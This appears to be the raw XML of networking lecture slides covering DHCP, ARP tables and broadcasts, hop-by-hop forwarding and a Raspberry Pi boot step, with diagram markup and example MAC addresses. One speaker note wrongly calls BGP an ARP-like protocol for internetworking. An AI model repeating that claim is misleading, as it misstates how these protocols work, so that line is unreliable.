          </a:p>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bootcode.bin reads the third stage bootloader (generically, loader.bin or u-boot.bin) from the SD card into RAM, and runs it.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="598028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247" y="150283"/>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Local mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178352" y="1796473"/>
            <a:ext cx="11582400" cy="4635708"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900"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Two Protocols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Dynamic Host Configuration Protocol (DHCP)</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End host learns how to send packets</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Learn IP address, DNS servers, and gateway</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Address Resolution Protocol (ARP)</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Others learn how to send packets to the end host</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Learn mapping between IP address &amp; interface address</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ARP allows devices to map MAC addresses to IP addresses. A device will send out (broadcast) an ARP Request message, to find out the MAC address corresponding to the IP Address. The device that is being queried will respond (unicast) with an ARP Response message. Mappings between MAC addresses and IP addresses are stored in the ARP table. Entries in the ARP table will time out (soft state).</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Adapter can send directly to MAC address on a LAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">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50</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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF2AC54F-C89A-E14C-9E62-468D6A8708C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6894199" y="6027248"/>
            <a:ext cx="4906658" cy="4153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en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lan knows Mac addresses of local hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA9511E-6111-6F4F-80D6-4F10BD2097A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7559677" y="1163029"/>
            <a:ext cx="3911603" cy="2672558"/>
            <a:chOff x="201" y="1293"/>
            <a:chExt cx="3818" cy="2696"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="8" name="Object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8DDF09-4803-474E-91E7-079BB4E32176}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1869" y="1293"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s41301" name="Clip" r:id="rId4" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="7" name="Object 8">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA06D68-B250-8143-9A62-CC230FC5F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9" y="1293"/>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Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E53136F-D0BC-D544-BD95-D7B62A0FD375}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1356" y="2055"/>
              <a:ext cx="1289" cy="1291"/>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 name="Object 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63362216-C8AD-0941-862E-48E250EB4D85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3255" y="2437"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s41302" name="Clip" r:id="rId6" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="9" name="Object 10">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E7A299B-1D39-0446-9DEE-DC5600D31E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 y="2437"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9571343E-AA36-F647-9318-F72ED09AB588}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1860" y="3661"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s41303" name="Clip" r:id="rId7" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="10" name="Object 11">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9A8E89-92FA-084B-93CD-FE466ACE70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0" y="3661"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A42B5B8-00F4-694B-B91C-B1AB1907A114}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="310" y="2338"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s41304" name="Clip" r:id="rId8" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="17462500" imgH="14478000" progId="MS_ClipArt_Gallery.2">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="11" name="Object 12">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88E664E-4595-4D40-8B7A-6D9D38234F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 y="2338"/>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3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{502FD76D-C54C-B947-B04E-AAED608EC45A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3130" y="2531"/>
              <a:ext cx="170" cy="1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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF13E26-0561-6946-AE45-9D50880710C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="654" y="2416"/>
              <a:ext cx="170" cy="1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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35AACDEC-3A38-1849-81FE-2791B270133A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2040" y="1604"/>
              <a:ext cx="121" cy="16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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C982D4-DBF5-0440-A2E5-48778D9F98EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1998" y="3501"/>
              <a:ext cx="121" cy="16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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3B1459-AB74-7346-88D8-74305E0BBF4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="819" y="2482"/>
              <a:ext cx="5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18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F6A568C-2DBC-744E-A58A-96A670A37B66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2085" y="1769"/>
              <a:ext cx="0" cy="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19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFC2B95-D4BD-574D-A2DB-0F17364AFF3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2629" y="2588"/>
              <a:ext cx="5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20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D22D9D9-3254-084D-BAA4-ED6BE32769EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2061" y="3221"/>
              <a:ext cx="0" cy="2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Text Box 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{126E9E50-7D66-E642-A08B-CAE166F2E76A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2287" y="1585"/>
              <a:ext cx="11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1A-2F-BB-76-09-AD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Line 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A36978C-D04D-4841-AAD9-40AD2AEF4074}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2166" y="1671"/>
              <a:ext cx="162"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23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA57EA5E-C4FB-8F42-928A-60E2E56415F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3205" y="2653"/>
              <a:ext cx="0" cy="2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Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB363E49-2E6B-B848-B9CE-705AF84C49B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2822" y="2899"/>
              <a:ext cx="1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58-23-D7-FA-20-B0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Line 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B2BBB8-6ECA-7A46-AED3-3A6CFE735B75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2126" y="3570"/>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26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767DA30A-3368-0C4C-A402-276C84482A41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2392" y="3499"/>
              <a:ext cx="11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0C-C4-11-6F-E3-98</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Line 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D1183F-E118-B741-B3F0-096DA7DF4B20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="737" y="2545"/>
              <a:ext cx="0" cy="2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28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04B7871-7ED3-974C-B238-C799F58C5C0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="201" y="2818"/>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71-65-F7-2B-08-53</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Text Box 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C957C269-89C3-164E-BBF5-D95709B09FAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1661" y="2284"/>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b="0">
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>   LAN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895656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Get a DHCP lease</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1496290"/>
            <a:ext cx="11582400" cy="4578455"/>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Broadcasting: sending to everyone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Special destination address: FF-FF-FF-FF-FF-FF</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All adapters on the LAN receive the packet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Multiple servers may respond</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The client can decide which offer to accept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Accepting one of the offers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Client sends a DHCP request echoing the parameters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The DHCP server responds with an ACK to confirm</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Dynamic Host Configuration Protocol. The protocol that provides a host with its IP address upon connecting to a network. When a host connects to a new network, it sends a DHCP discovery message to notify the DHCP server(s) that it needs an IP address. The server sends an Offer message, containing an offered IP address, a subnet mask, the IP address of the first-hop router, and a lease time. The host will send a Request, corresponding to the offer it would like to accept. The server responds with an Acknowledgement/Acceptance message. All DHCP messages are broadcasted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" alt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51</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536246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Local Address resolution (ARP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1662545"/>
            <a:ext cx="11582400" cy="4693806"/>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Every node maintains an ARP table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(IP address, MAC address) pair</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Consult the table when sending a packet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Map destination IP address to destination MAC address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Encapsulate and transmit the data packet directly to MAC address on LAN</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What if the IP address is not in the table?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Sender broadcasts: “Who has IP address 1.2.3.156?”</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Receiver responds: “MAC address 58-23-D7-FA-20-B0”</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Sender caches the result in its ARP table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No need for network administrator to get involved</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ARP is used in LAN.  A similar protocol, BGP, is used for internetworking.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52</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000776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CB73E24-D4F7-1F48-B48D-4DEB7D4EE916}"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899074" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A113C1-4F1E-4F4F-9E40-FC891FF09515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="152400"/>
            <a:ext cx="10238509" cy="729384"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hop-by-Hop Packet Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899075" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C38F2C-C885-1C44-9E87-9673FC04B9D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505691" y="1565564"/>
            <a:ext cx="11180618" cy="4662054"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Routing is point to point and routes may vary even within LAN</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router has a forwarding table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Maps destination addresses…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 to outgoing interfaces</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Upon receiving a packet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Inspect the destination IP address in the header</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Index into the table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Determine the outgoing interface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Forward the packet out that interface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Then, the next router in the path repeats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And the packet travels along the path to the destination</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 similar thing happens at the LAN edge </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18110BA6-5B63-864C-AEAF-95DD086810C5}"/>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702613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9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90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90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90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90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90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90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90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90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90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907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99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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2758E15-4245-934E-85D3-867D5DE062CB}"/>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906242" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B55F37-5761-FF4A-A4B9-9BA313DA1AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274174" y="277091"/>
            <a:ext cx="11529898" cy="858982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What reaching the local end hosts?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906243" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56DE9E3-1E4B-5141-AB87-46E9A3BC465D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454284" y="1662545"/>
            <a:ext cx="11529898" cy="4336473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
